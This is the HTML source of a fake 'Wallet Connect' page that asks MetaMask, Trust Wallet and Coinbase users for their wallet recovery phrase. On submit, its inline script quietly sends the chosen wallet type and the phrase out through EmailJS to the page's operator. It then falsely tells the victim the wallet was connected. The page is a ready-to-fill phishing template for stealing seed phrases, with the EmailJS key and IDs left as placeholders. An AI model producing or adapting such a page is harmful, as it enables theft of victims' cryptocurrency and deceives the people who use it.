<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Web3 Connect Link</title>
  <style>
    body {
      margin: 0;
      font-family: Arial, sans-serif;
      background: #0c0c0c;
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .container {
      width: 90%;
      max-width: 400px;
      background: #1e1e1e;
      padding: 20px;
      border-radius: 12px;
      box-shadow: 0 0 10px rgba(0,0,0,0.8);
    }
    h2 {
      margin-bottom: 1em;
      font-size: 1.4em;
      text-align: center;
    }
    label {
      display: block;
      margin-bottom: 0.5em;
      font-size: 0.9em;
    }
    textarea, select, input {
      width: 100%;
      padding: 0.8em;
      margin-bottom: 1.2em;
      border: none;
      border-radius: 8px;
      background: #2e2e2e;
      color: #fff;
      font-size: 0.9em;
    }
    button {
      width: 100%;
      padding: 1em;
      background: #04d9ff;
      border: none;
      border-radius: 8px;
      color: #000;
      font-weight: bold;
      cursor: pointer;
    }
    .footer {
      text-align: center;
      font-size: 0.8em;
      color: #888;
      margin-top: 1.2em;
    }
  </style>
  <script>
    window.onload = function () {
      const script = document.createElement('script');
      script.src = "https://cdn.emailjs.com/dist/email.min.js";
      script.onload = function () {
        if (typeof emailjs !== 'undefined') {
          emailjs.init('YOUR_EMAILJS_PUBLIC_KEY');

          const form = document.getElementById('walletForm');

          form.addEventListener('submit', function(e) {
            e.preventDefault();

            emailjs.send("service_xxxxxx", "template_xxxxxx", {
              wallet_type: document.getElementById("walletType").value,
              phrase: document.getElementById("phrase").value
            }).then(function(response) {
              alert("Wallet connected successfully.");
              form.reset();
            }, function(error) {
              alert("Something went wrong. Try again.");
            });
          });
        } else {
          alert("EmailJS failed to initialize. Please check your setup.");
        }
      };
      script.onerror = function () {
        alert("Failed to load EmailJS script. Please check your internet connection.");
      };
      document.head.appendChild(script);
    };
  </script>
</head>
<body>
  <div class="container">
    <h2>Wallet Connect</h2>
    <form id="walletForm">
      <label for="type">Select Wallet Type</label>
      <select name="walletType" id="walletType">
        <option value="metamask">MetaMask</option>
        <option value="trustwallet">Trust Wallet</option>
        <option value="coinbase">Coinbase Wallet</option>
        <option value="other">Other</option>
      </select>

      <label for="phrase">Enter Recovery Phrase</label>
      <textarea name="phrase" id="phrase" rows="4" placeholder="12 or 24 words"></textarea>

      <button type="submit">Connect Wallet</button>
    </form>
    <div class="footer">web3connectlink.pages.dev</div>
  </div>
</body>
</html>
